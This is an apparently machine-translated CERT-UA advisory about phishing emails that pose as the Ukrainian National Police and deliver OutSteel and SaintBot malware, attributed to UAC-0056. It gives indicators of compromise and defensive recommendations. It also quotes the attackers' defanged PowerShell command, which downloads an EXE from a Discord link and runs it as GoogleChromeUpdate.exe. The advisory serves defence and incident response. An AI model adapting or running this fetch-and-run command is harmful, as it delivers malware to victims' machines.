1/3 CERT-UA cert.gov.ua/article/18419 general information The Governmental Computer Emergency Response Team of Ukraine CERT-UA received information from the coordinating entity on the dissemination, allegedly on behalf of the National Police of Ukraine, of e-mails with attachments in the form of password-protected DOCX documents, such as “Crime Report (Belous Alexei Sergeevich) .docx "or" Report of a crime.docx ". These documents contain built-in objects, the activation of which will create and run a Javascript file on your computer, such as "GSU207@POLICE.GOV.UA - Message (2) .js". The latter, using powershell, will connect to the Discord service and download and execute an EXE file, which will damage the victim's computer with the malicious program OutSteel (compilation date: 30.01.2022). The activity is associated with the activities of the UAC-0056 group. Indicators of compromise Files: 4d01975268c215fc26ed79ebd17ec22d Report on the commission of a crime (Belous Alexei Sergeevich) .docx 12ed130045b2e731bc66c9261c88efaa GSU207@POLICE.GOV.UA - Messages (2) .js 22c1d43016cb2b8b9e5e5e9895526354 Report of a crime .docx 0e3c3fe6167485807c4d36a904dfcae1 GSU207@POLICE.GOV.UA - Messages (17) .js 259f06fcdb971f606d239b3178110981 putty.exe ccc3750d9270d1e8c95649d91f94033b putty.dmp.exe (OutSteel) 5fa2c64ed3e9944030b6fd9f3d3d7102 puttyjejfrwu.exe 57a10dad336f1a6cb206dca7ddd3fcaf AutoIt.exe (OutSteel) ab2a92e0fc5a6f63336e442f34089f16 1406.exe (SaintBot) af9a60ea728985f492119ebf713e0716 load4849kd30.exe (SaintBot) 247165c7d96bf443b6a7360a44b7dcfb f0d.exe cd8915c63f3134425aa7c851f5f1e645 f1d.exe Network: hxxps: //cdn.discordapp [.] com / attachments / 932413459872747544/938291977735266344 / putty.exe hxxps: //cdn.discordapp [.] com / attachments / 932413459872747544/938317934026170408 / puttyjejfrwu.exe hxxp: //185.244.41 [.] 109: 8080 / upld / hxxp: // eumr [.] site / load74h74830.exe 185.244.41 [.] 109 eumr [.] site mariaparsons10811 @ gmail [.] com https://cert.gov.ua/article/18419 2/3 Hosts: % PUBLIC% \ GoogleChromeUpdate.exe % USERPROFILE% \ Documents \ .exe % TEMP% \ GSU207@POLICE.GOV.UA - Message (2) .js % TEMP% \ rmm.bat % TEMP% \ svjhost.exe Processes: 1 powershell.exe "% USERPROFILE% \ Documents \ .exe" 11 powershell.exe "% USERPROFILE% \ Documents \ .exe" 3 powershell.exe>
: 443 22 powershell.exe cdn.discordapp [.] Com 1 wscript.exe powershell.exe "% SYSTEMROOT% \ System32 \ WindowsPowerShell \ v1.0 \ powershell.exe" [NeT.seRvIcepOiNtmanAgER] :: sECURITyPROToCOL = [neT.SEcurITypRotOcoLType] :: Tls12; Irm -uRI ("hxxps: //cdn.discordapp [.] Com / attachments / 932413459872747544/938291977735266344 / putty.exe") -outfilE "$ enV: PuBLICGoogleChromeUpdate.exe"; sTArt-pRoceSs "$ eNV: pUBLIcGoogleChromeUpdate.exe" 1 WINWORD.EXE wscript.exe "% SYSTEMROOT% \ System32 \ WScript.exe" "% TEMP% \ GSU207@POLICE.GOV.UA - Messages (2) .js" Additional Information We recommend that you block access to services on the Internet that are not necessary and / or may create additional risks (such as Discord). We draw your attention to the correct configuration of security policies and security measures for your computer, namely: prohibit MS Office processes (in particular, WINWORD.EXE) from running potentially dangerous programs, in this case - wscript.exe (Sysmon EventID: 1); monitor network connections (Sysmon EventID: 3.22) of potentially dangerous programs (powershell.exe, etc.) Graphic images 3/3 Fig. 1 Example of an email and a malicious document